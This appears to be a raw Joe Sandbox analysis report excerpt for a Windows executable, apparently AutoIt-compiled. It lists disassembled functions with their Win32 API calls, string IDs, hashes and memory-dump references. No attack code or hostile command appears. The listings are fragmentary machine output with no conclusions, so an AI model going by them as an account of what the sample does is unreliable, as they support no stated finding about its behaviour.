                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2577412497-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1914653954-2746444292
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00470EC0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00441672: PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00470F32
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00470F3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00470F65
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00470FA2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00470FB7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00470FC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FD7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00470FF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • DragFinish.SHELL32(?), ref: 00470FFA
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 004710E2
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4085615965-3440237614
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4ea733558c9692989c64ea5f36e42be92b13a76634dc251051ad4f24abf1ae27
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d46f0dc6a402942f8e7c2c56388383e1fbb47624789ac98c9c2308d24ef9fef1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 076190716043019FD310EF65CC85E9FB7A8FFC9704F104A2EF59497291DB74AA098BAA
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3832890014-4202584635
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$CtrlFocus
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1534620443-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1441871840-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3631882475-2268648507
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%u
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1899580136-679674701
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: InfoItemMenu$Sleep
• String ID: 0
• API String ID: 1196289194-4108050209
APIs
• GetDC.USER32(00000000), ref: 0043143E
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
• CreateCompatibleDC.GDI32(00000000), ref: 00431459
• SelectObject.GDI32(00000000,?), ref: 00431466
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
Strings
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
Strings
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1976180769-4113822522
APIs
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__fassign
• String ID:
• API String ID: 461458858-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
• GlobalLock.KERNEL32(00000000), ref: 004300F6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• GlobalUnlock.KERNEL32(00000000), ref: 0043010C
• CloseHandle.KERNEL32(00000000), ref: 00430113
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• GlobalFree.KERNEL32(00000000), ref: 00430150
• GetObjectW.GDI32(?,00000018,?), ref: 00430177
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
• DeleteObject.GDI32(?), ref: 004301D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
APIs
Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1965227024-3771769585
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
